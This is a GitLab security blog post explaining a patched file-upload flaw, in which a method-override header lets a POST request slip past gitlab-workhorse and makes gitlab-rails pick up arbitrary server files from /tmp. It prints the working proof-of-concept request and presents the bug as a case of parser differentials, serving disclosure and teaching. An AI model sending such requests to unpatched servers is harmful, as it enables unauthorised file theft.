Blog Security How to exploit parser differentials
March 30, 2020
8 min read

How to exploit parser differentials

Your guide to abusing 'language barriers' between web components.

closeup-photo-of-black-and-blue-keyboard-1194713.jpg

The move to microservices-based architecture creates more attack surface for nefarious actors, so when our security researchers discovered a file upload vulnerability within GitLab, we patched it right up in our GitLab 12.7.4 security release. We dive deeper into the problems that lead to this vulnerability and use it to illustrate the underlying concept of parser differentials.

File Uploads in GitLab

To understand the file upload vulnerability we need to go a bit deeper into file uploads within GitLab, and have a look at the involved components.

GitLab Workhorse

The first relevant component is GitLab's very own reverse proxy called gitlab-workhorse.gitlab-workhorse fulfills a variety of tasks, but for this specific example we only care about certain kinds of file uploads.

The second component is gitlab-rails, the Ruby on Rails-based heart of GitLab. It's the main application part of GitLab and implements most of the business logic.

The following source code excerpts from gitlab-workhorse are based on the 8.18.0 release which was the most recent version at the time of identifying the vulnerability.

Consider the following route, defined in internal/upstream/routes.go, which handles file uploads for Conan packages:

// Conan Artifact Repository
route("PUT", apiPattern+`v4/packages/conan/`, filestore.BodyUploader(api, proxy, nil)),

The route defined above will pass any PUT request to paths underneath /api/v4/packages/conan/ to the BodyUploader. Within this BodyUploader now some magic happens. Well, actually, it's not magic, the BodyUploader receives the uploaded file and lets the gitlab-rails backend know where the file has been placed. This happens in internal/filestore/file_handler.go.

Also worth mentioning: Any not-matched routes in gitlab-workhorse will be passed on to the backend without modification. That's especially important in our discussion for non-PUT routes under /api/v4/packages/conan/.

// GitLabFinalizeFields returns a map with all the fields GitLab Rails needs in order to finalize the upload.
func (fh *FileHandler) GitLabFinalizeFields(prefix string) map[string]string {
	data := make(map[string]string)
	key := func(field string) string {
		if prefix == "" {
			return field
		}

		return fmt.Sprintf("%s.%s", prefix, field)
	}
  
	if fh.Name != "" {
		data[key("name")] = fh.Name
	}
	if fh.LocalPath != "" {
		data[key("path")] = fh.LocalPath
	}
	if fh.RemoteURL != "" {
		data[key("remote_url")] = fh.RemoteURL
	}
	if fh.RemoteID != "" {
		data[key("remote_id")] = fh.RemoteID
	}
	data[key("size")] = strconv.FormatInt(fh.Size, 10)
	for hashName, hash := range fh.hashes {
		data[key(hashName)] = hash
	}
  
	return data
}

So gitlab-workhorse will replace the uploaded file name by the path to where it has stored the file on disk, such that the gitlab-rails backend knows where to pick it up.

Observe the following original request, as received by gitlab-workhorse:

PUT /api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py HTTP/1.1
Host: localhost
User-Agent: Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-Checksum-Sha1: 93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78
Content-Length: 1765
Authorization: Bearer [.. shortened ..]

from conans import ConanFile, CMake, tools


class HelloConan(ConanFile):
    name = "Hello"
[.. shortened ..]

This is what this request will look like to gitlab-rails after gitlab-workhorse has processed it (excerpted from api_json.log):

{
  "time": "2020-02-20T14:49:44.738Z",
  "severity": "INFO",
  "duration": 201.93,
  "db": 67.34,
  "view": 134.59,
  "status": 200,
  "method": "PUT",
  "path": "/api/v4/packages/conan/v1/files/Hello/0.1/root+xxxxx/beta/0/export/conanfile.py",
  "params": [
    {
      "key": "file.md5",
      "value": "719f0319f1fd5f6fcbc2433cc0008817"
    },
    {
      "key": "file.path",
      "value": "/var/opt/gitlab/gitlab-rails/shared/packages/tmp/uploads/582573467"
    },
    {
      "key": "file.sha1",
      "value": "93ebaf6e85e8edde99c1ed46eaa1b5e1e5f4ac78"
    },
    {
      "key": "file.sha256",
      "value": "f7059b223cd4d32002e5e34ab1ae5b4ea12f3bd0326589b00d5e910ce02c1f3a"
    },
    {
      "key": "file.sha512",
      "value": "efbe75ea58bd817d42fd9ca5ac556abd6fbe3236f66dfad81d508b5860252d32d1b1868ee03c7f4c6174a0ba6cc920a574b5865ca509f36c451113c9108f9a36"
    },
    {
      "key": "file.size",
      "value": "1765"
    }
  ],
  "host": "localhost",
  "remote_ip": "172.17.0.1, 127.0.0.1",
  "ua": "Conan/1.22.0 (Python 3.8.1) python-requests/2.22.0",
  "route": "/api/:version/packages/conan/v1/files/:package_name/:package_version/:package_username/:package_channel/:recipe_revision/export/:file_name",
  "user_id": 1,
  "username": "root",
  "queue_duration": 16.59,
  "correlation_id": "aSEqrgEfvX9"
}

In particular, the params entry file.path is of interest, as it denotes the file system path where gitlab-workhorse has placed the uploaded file.

gitlab-rails

This gitlab-workhorse-modified request, as gitlab-rails will see it, is handled in lib/uploaded_file.rb within the from_params method:

01  def self.from_params(params, field, upload_paths)
02    path = params["#{field}.path"]
03    remote_id = params["#{field}.remote_id"]
04    return if path.blank? && remote_id.blank?
05
06    file_path = nil
07    if path
08      file_path = File.realpath(path)
09
10      paths = Array(upload_paths) << Dir.tmpdir
11      unless self.allowed_path?(file_path, paths.compact)
12        raise InvalidPathError, "insecure path used '#{file_path}'"
13      end
14    end
15
16    UploadedFile.new(file_path,
17      filename: params["#{field}.name"],
18      content_type: params["#{field}.type"] || 'application/octet-stream',
19      sha256: params["#{field}.sha256"],
20      remote_id: remote_id,
21      size: params["#{field}.size"])
22  end

We can see here the handling of the uploaded file reference. The part in line 10-13 in the snippet above implements a whitelist of a specific set of paths from where a gitlab-workhorse uploaded file will be accepted.Dir.tmpdir which resolves to the path /tmp is added to the whitelist as well. In the subsequent lines a new UploadedFile is constructed from the file.path and other parameters gitlab-workhorse has set.

gitlab-workhorse bypass

So we've seen the inner workings of both gitlab-workhorse and gitlab-rails when it comes to file uploads for Conan packages. In recap it would go as follows:

sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: PUT request to conan registry
    workhorse->>workhorse: Place uploaded file on disk and re-write PUT request
    workhorse->>Rails: Pass on modified PUT request
    Rails->>Rails: Pick up file from disk and store in UploadedFile

From an attacker perspective it would be nice to meddle with the modified PUT request, especially control over the file.path parameter would allow us to grab arbitrary files from /tmp and the defined upload_paths. But as gitlab-workhorse sits right in front of gitlab-rails we can't just pass those parameters or otherwise interact directly with gitlab-rails without going via gitlab-workhorse.

We can indeed achieve this by leveraging the fact that gitlab-workhorse parses the HTTP requests in a different way than gitlab-rails does. In particular, we can use Rack::MethodOverride in gitlab-rails which is a default middleware in Ruby on Rails applications. The Rack::MethodOverride middleware allows us to send a POST request and let gitlab-rails know "well, actually this is a PUT request! ¯\_(ツ)_/¯ ". With this little trick we can sneak past the gitlab-workhorse route which would intercept the PUT request, as gitlab-workhorse is not aware of the overridden POST method. So by specifying either a _method=PUT parameter or a X-HTTP-METHOD-OVERRIDE: PUT HTTP header we can indeed directly point gitlab-rails to files on disk. The method override is used a lot in Ruby on Rails applications to allow simple <form> based POST requests to use other REST-based methods like PUT and DELETE by overriding the <form>s POST request with the _method parameter.

So a POST request to the right Conan endpoint with a file.path and file.size parameter will do the trick. A full request using this bypass would look like this:

POST /api/v4/packages/conan/v1/files/Hello/0.1/lol+wat/beta/0/export/conanmanifest.txt?file.size=4&file.path=/tmp/test1234 HTTP/1.1
Host: localhost
User-Agent: Conan/1.21.0 (Python 3.8.1) python-requests/2.22.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
X-HTTP-Method-Override: PUT
X-Checksum-Deploy: true
X-Checksum-Sha1: ee96149f7b93af931d4548e9562484bdb6ac8fda
Content-Length: 4
Authorization: Bearer [.. shortened ..]

asdf

This would, instead of uploading a file, let us get a hold of the file /tmp/test1234 from the GitLab server's file system. In recap, the flow to exploit this issue looks as follows:

sequenceDiagram
    participant User
    participant workhorse
    participant Rails
    User->>workhorse: POST request to conan registry
    workhorse->>workhorse: Route does not match anything
    workhorse->>Rails: Pass on unmodified POST request
    Rails->>Rails: Interpret as PUT and pick up file from disk

We fixed this issue within gitlab-workhorse by signing Requests which pass gitlab-workhorse, the signature then is verified on the gitlab-rails side

How parser differentials can introduce vulnerabilities

Let's take a huge step back and see from an high-level perspective what just happened. We've had gitlab-workhorse and gitlab-rails both looking at a POST request. But gitlab-rails ultimately saw a PUT request due to the overridden HTTP method.

What occurred here is a case of a parser differential, as gitlab-workhorse and gitlab-rails parsed the incoming HTTP request differently. The term parser differential originates from the Language-theoretic Security approach. It denotes the fact that two (or more) different parsers "understand" the very same message in a different way. Or, as described in the LangSec handout as follows:

Different interpretation of messages or data streams by components breaks any assumptions that components adhere to a shared specification and so introduces inconsistent state and unanticipated computation.

Indeed such issues and the consequential unanticipated computation get more and more common when we look at modern web environments. The days of web applications being a stand-alone bunch of scripts invoked on a web server are long gone. The rise of microservices leads to complex environments and the very same message (or HTTP request) might be interpreted by several different services in several different ways. Just as shown in the above example this sometimes comes along with security implications.

From the point of view of a pragmatic bug hunter, the idea of parser differentials is very interesting as those issue can yield unique security bugs. Consider, for instance, this RCE in couchdb. Also the HTTP desync attack technique, which has gotten a lot attention in the bug bounty community, is a matter of parser differentials.

For the developer perspective we need to be aware of other components and their parsing behavior in order to avoid security issues which arise from interpreting the same message differently.

Cover Photo by Marta Branco on Pexels

We want to hear from you

Enjoyed reading this blog post or have questions or feedback? Share your thoughts by creating a new topic in the GitLab community forum. Share your feedback

Ready to get started?

See what your team could do with a unified DevSecOps Platform.

Get free trial

New to GitLab and not sure where to start?

Get started guide

Learn about what GitLab can do for your team

Talk to an expert